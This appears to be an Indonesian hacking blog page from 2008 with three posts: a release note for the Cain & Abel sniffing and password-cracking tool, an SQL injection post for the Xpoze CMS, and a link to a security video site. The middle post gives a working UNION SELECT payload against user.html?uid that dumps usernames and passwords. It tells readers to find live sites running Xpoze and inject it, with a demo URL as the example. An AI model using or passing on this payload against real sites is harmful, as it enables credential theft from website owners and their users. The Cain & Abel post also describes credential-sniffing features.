Chain & Abel 4.9.19 Released

• Author: sevli
• Filed under: hack
• Date: Jul 19,2008

Pada tanggal 17 bulan Juli ini (2008) developer Chain & Abel merilis versi terbaru dari Chain & Abel, seperti yang diketahui software ini termasuk 10 besar software yang paling banyak digunakan dalam bagian security jaringan. Memang didalam software ini sudah tercakup hampir semua kebutuhan untuk berbagai hal, mulai dari untuk mendeteksi penyebab jaringan menjadi berat sampai sekedar iseng mendapatkan password (gak baek neh ).

Oh ya, ini tambahan yang di”include”kan k versi barunya :

• mendukung Remote Desktop client v6 dalam APR-RDP sniffer
• mendukung Oracle TNS 10g (AES-128) dalam Oracle TNS Hashes Password Cracke
• mendukung Oracle TNS 10g (AES-128) dalam Oracle TNS sniffer filter
• UserField and PassField columns dalam HTTP sniffer list
• a “Note” column in all Cracker’s lists

Perbaikan di bagian offline NTLM hashes dumper when BootKey parameter is not specified dan offline NTLM hashes dumper when LM hash is not present.

Ditambah update untuk penggunaan karakter khusus Danies dalam bahasa Jerman. Pokoknya kalaw penasaran silahkan kunjungi saja situs developernya oxid.it dan download versi baru dari software handalan kamu ini. :))

SQL Injection Xpoze CMS

• Author: Aldo
• Filed under: Internet, Uncategorized, hack
• Date: Jul 10,2008

Xpoze PRO ?????

Xpoze PRO - The complete solution, easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs. Main features * SEO friendly URL and TAGS support (using Mod_Rewrite) * Fully Customizable CSS based HTML with TPL pages * Unlimited photos and images * Unlimited Categories & Sub-Categories * Unlimited keywords * Custom Credits * Custom Subscriptions * Simple, Medium and Advanced Search * Custom sorting of all image lists (auto saved for each user) * Multiple download sizes for Stock Photos * Direct File Download * Download Link to Email * Download File to Email * Download Link Auto Expires * Favorite Photos * Post Photo Reviews * Hyper linked keyword search * Admin WYSIWYG Content Editor * Site Statistics * User Account Statistics * Sell Prints & Products * Sell Image Collections * Free Directory * Auto generated thumbnails & Sample pictures * Display Photos By Photographer * Latest Photos Feature .. and lots more

Ada masalah pada user.html CMS XPOZE yang bisa di inject menggunakan sql injection.

Sebagai contoh cari website yang menggunakan XPOZE. Lalu injeksikan /user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0×3a,pass)
,19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*

Contohnya :

http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0×3a,pass)
,19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*

Maka akan muncul Username dan Password yang ada. Selanjutnya??? terserah anda… ingat aja dosa.

SecurityTube.Net hack video

• Author: Aldo
• Filed under: Internet, hack
• Date: Jul 9,2008

Website yang menyediakan layanan video sharing semakin banyak bermunculan. Ada yang sharing secara umum tanpa topik khusus hingga menspesifikan pada satu topik saja.

Salah satunya adalah securitytube.net yang mengkhususkan pada video security (baca:hacking). Walaupun baru versi beta website ini telah menyediakan video yang lumayan banyak untuk didownload.

Walaupun bukan yang pertama website ini cukup berguna. Ingin belajar dan tidak ingin jadi korban??? securitytube.net jawabannya.

NB:site lain http://veryangrytoad.com/